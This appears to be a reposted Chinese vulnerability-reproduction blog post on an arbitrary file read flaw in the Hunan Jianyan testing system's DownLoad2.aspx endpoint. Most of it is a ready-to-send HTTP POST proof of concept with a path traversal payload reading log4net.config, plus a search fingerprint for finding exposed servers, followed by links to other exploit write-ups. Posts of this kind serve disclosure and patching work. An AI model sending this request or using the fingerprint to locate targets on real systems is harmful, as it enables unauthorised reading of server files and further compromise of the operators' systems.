湖南建研检测系统存在DownLoad2.aspx任意文件读取漏洞

admin

108970
文章

90
评论

2024年5月31日11:50:00评论27 views字数 570阅读1分54秒阅读模式

1漏洞描述

湖南建研检测系统存在DownLoad2.aspx任意文件读取漏洞，导致系统被攻击与控制。

2漏洞POC

POST /Common/DownLoad2.aspx HTTP/1.1
Host: 地址
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

path=..%2Flog4net.config&Name=

3漏洞复现

首页

湖南建研检测系统存在DownLoad2.aspx任意文件读取漏洞

GET方式访问

湖南建研检测系统存在DownLoad2.aspx任意文件读取漏洞

网络测绘

body="Login/QRLogin.ashx"

原文始发于微信公众号（我吃饼干）：【漏洞复现】湖南建研检测系统存在DownLoad2.aspx任意文件读取漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

湖南建研检测系统存在DownLoad2.aspx任意文件读取漏洞

【成功复现】XWiki Platform远程代码执行漏洞(CVE-2024-29973)

某HCM智能人力资源系统存在SQL注入漏洞导致Getshell

某华ICC智能物联综合管理平台env敏感信息泄露

GeoServer开源地理服务 wfs 远程命令执行(CVE-2024-36401)

用友NC-oacoSchedulerEvents-SQL注入漏洞复现

CVE-2024-29973 漏洞复现

用友 GRP-U8 FileUpload 任意文件上传漏洞

瑞友天翼应用虚拟化系统SQL注入漏洞

go-getter命令注入漏洞

Openssh CVE-2024-6387

发表评论

在线咨询

微信